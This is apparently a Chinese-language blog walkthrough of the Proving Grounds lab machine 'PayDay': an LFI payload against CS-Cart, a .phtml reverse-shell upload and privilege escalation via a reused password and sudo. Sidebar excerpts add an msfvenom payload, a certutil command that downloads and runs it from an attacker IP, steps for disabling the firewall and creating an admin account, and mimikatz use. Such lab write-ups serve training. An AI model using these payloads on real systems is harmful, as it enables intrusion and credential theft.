Proving Grounds Practice : PayDay Walkthrough

-

 Proving Grounds Practice : PayDay Walkthrough


Foothole (立足點 ) :

  • 80 Port 發現 CMS "CS-Cart",Searchsploit 後發現 LFI 可以成功讀到 /etc/passwd
  • 接著查看 /?version 發現版本就是 1.3.3 然後使用另一個 RCE 48891
  • 依據說明上傳 *.phtml 然後執行利用拿到 reverse shell

PE ( 提權 ) :

  • 現有使用者 www-data 甚麼權限都沒有
  • 直接列舉使用者 patrick 發現密碼一樣可以 ssh 登入
  • sudo -l 後提權成功

注意事項 :


第一步 Rustscan,└─$ rustscan -a 192.168.187.39 --scripts none  --ulimit 5000 | tee rustscan



snmp closed,└─$ sudo nmap -sU -p 161 192.168.187.39 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 22,80,110,139,143,445,993,995 192.168.187.39 | tee nmap

22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

110/tcp open  pop3        Dovecot pop3d

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)

143/tcp open  imap        Dovecot imapd

445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)

993/tcp open  ssl/imap    Dovecot imapd

995/tcp open  ssl/pop3    Dovecot pop3d




enum4linux,└─$ enum4linux -a 192.168.187.39 | tee enum4linux



使用者名稱測試 SSH 連線,發現不給用密碼方式連線,馬上想到要去找 Key





whatweb,└─$ whatweb http://192.168.187.39 | tee whatweb



80 /



80 /index.php?target=sitemap



admin:admin 測試登入成功




searchsploit CS-Cart



直接參考 48890 LFI : https://www.exploit-db.com/exploits/48890

PoC : http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00



成功讀到了

使用者帳號 patrick



讀看看有沒有 id_rsa,結果無該檔案,http://192.168.187.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../home/patrick/.ssh/id_rsa%00




http://192.168.187.39/?version 發現版本是 1.3.3,都跟我們在 searchsploit 中搜尋到的一樣




看看另外一個 RCE 48891 參考 : https://www.exploit-db.com/exploits/48891

描述寫將 php Reverse shell 的檔案改成 .phtml,接著透過 file manager 上傳

然後訪問 http://[victim]/skins/shell.phtml --> Profit. ...!



實在是相當的不清楚,好在偉大的 Google 可以幫助,搜尋到這一篇

https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

步驟大概如下

1. 登入 admin 帳號(不可以登入一般帳號),然後存取 /admin.php

2. 在 "look and Feel" 點擊 "template editor"

3. 上傳 .php 但是副檔名要先改成 .phtml

4. 接著就可以訪問 http://[victim]/skins/whoami.phtml

5. 拿到 RCE



/admin.php 使用 admin:admin 登入



Look and Feel --> Template Editor



上傳檔案 php-reverse-shell-phtml



存取 http://192.168.187.39/skins/php-reverse-shell.phtml,拿到 Reverse Shell 了



cat /etc/crontab



sudo -l



pspy64 跑不起來



SUID Check,find / -perm -u=s -type f 2>/dev/null



看來有 MySQL



Chisel 搭建不起來



LFI 實有發現使用者帳號是 patrick 所以嘗試用 patrick 登入 SSH 試試看,但是出現錯誤

Unable to negotiate with 192.168.187.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss



查了一下發現這一篇 https://blog.alanwei.com/blog/2022/01/24/ssh-no-matching-host-key-type-found/

新增一筆如下

其他參考說明 : https://blog.csdn.net/Bruce1114/article/details/128266565

這個原因主要是 openssh >= 8.8p1 版本後直接禁用了 ssh-rsa 演算法,但是靶機只支援 ssh-rsa 演算法,又不能升級靶機只好把攻擊機的 ssh-rsa 演算法啟用,下列是針對該台伺服器啟用

只要換了 IP 或是其他台都一樣要再設定一次,也可以直接整個 Global 啟用,參考連結設定即可



再登入一次就成功了,且看來 patrick 的密碼就是 patrick



sudo -l 發現可以執行 (ALL) ALL

那就直接 sudo su 就成為 root 了



補充說明 :

在原有 www-data 使用者的 tty 介面中要切換使用者 patrick 時,輸入密碼直接跳過無法輸入密碼




於 TTY 介面 SSH 本機一樣失敗




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容